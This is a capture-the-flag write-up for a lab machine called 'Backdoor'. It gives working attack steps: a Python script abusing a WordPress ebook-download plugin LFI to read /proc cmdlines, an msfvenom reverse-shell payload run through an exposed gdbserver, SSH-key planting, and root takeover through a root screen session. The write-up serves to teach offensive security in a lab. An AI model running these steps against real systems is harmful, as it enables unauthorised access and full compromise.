Summary
This box includes a unique way of enumerating a machine through an LFI by fuzzing for a specific PID that spawned a service on port 1337. At least I hadn’t seen it before trying it. The privesc step however is rather straight forward.
Foothold
Let’s start of with an nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Nmap 7.92 scan initiated Sat Nov 20 14:36:07 2021 as: nmap -sC -sV --open -p- -oA nmap_scans/scan_full 10.129.102.115
Nmap scan report for 10.129.102.115
Host is up (0.071s latency).
Not shown: 62690 closed tcp ports (conn-refused), 2842 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 20 14:36:55 2021 -- 1 IP address (1 host up) scanned in 48.52 seconds
Based on the nmap scan we can conclude that it is using Wordpress. Since this is a wordpress site it is usually a good idea to check which plugins are used. this can be done by checking the /wp-content/plugins directory. We quickly learn that a plugin named ebook-download 1.1 is installed. Searching for exploits related to this leads to the following poc on exploit-db: https://www.exploit-db.com/exploits/39575
It’s a very simple poc. Basically we can use the ebook-download plugin to download local files from the server granting us LFI.
Before we continue it might be a good idea to learn what service is running on port 1337. I wrote a very simple script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests
target = '/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/{}/cmdline'
url = 'http://10.129.107.129'
for i in range(1000):
r = requests.get(url + target.format(i))
result = r.text.split("cmdline")[3].split("<script>")[0]
if result == '':
continue
else:
print(r.text.split("cmdline")[3].split("<script>")[0] + '\n')
The script simply automates the process of getting the cmdline which initiated the process associated with the pid in the url. We don’t know what pids are found in the /proc folder on the target system, so I just used a for-loop and printed all non-empty results.
Running this script gives us the following results (among others):
1
/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
Based on this it seems that there is a gdb server on port 1337
To exploit this we can create a reverse shell by using msfvenom: msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o rev.elf
we can then connect to the gdb server by using gdb:
1
2
3
4
5
6
gdb
target extended-remote IP:PORT
remote put rev.elf rev.elf
set remote exec-file /home/user/rev.elf
show remote exec-file
run
The above commands start by connecting to the GDB server. After this the rev.elf file is sent to the server with the same name. The file is then chosen to be run and then executed. When the file is run we of course get a reverse shell on the target system.
To get a more stable shell we simply use wget to get the id_rsa.pub file from our own system. We then rename this file to authorized_keys on the target system and connect via ssh:
Privilege escalation
We start out by finding SUID binaries.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
user@Backdoor:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
screen is set as a SUID binary.
1
2
3
4
5
6
7
8
ser@Backdoor:~$ ls -laR /var/run/screen
/var/run/screen:
total 0
drwxr-xr-x 4 root utmp 80 Jun 13 14:43 .
drwxr-xr-x 25 root root 760 Jun 13 14:40 ..
drwx------ 2 root root 60 Jun 13 14:04 S-root
drwx------ 2 user user 40 Jun 13 14:43 S-user
ls: cannot open directory '/var/run/screen/S-root': Permission denied
Based on this output there is a screen session running as root. To switch to this session we can use the -x flag:
1
screen -x root/root
and rooted!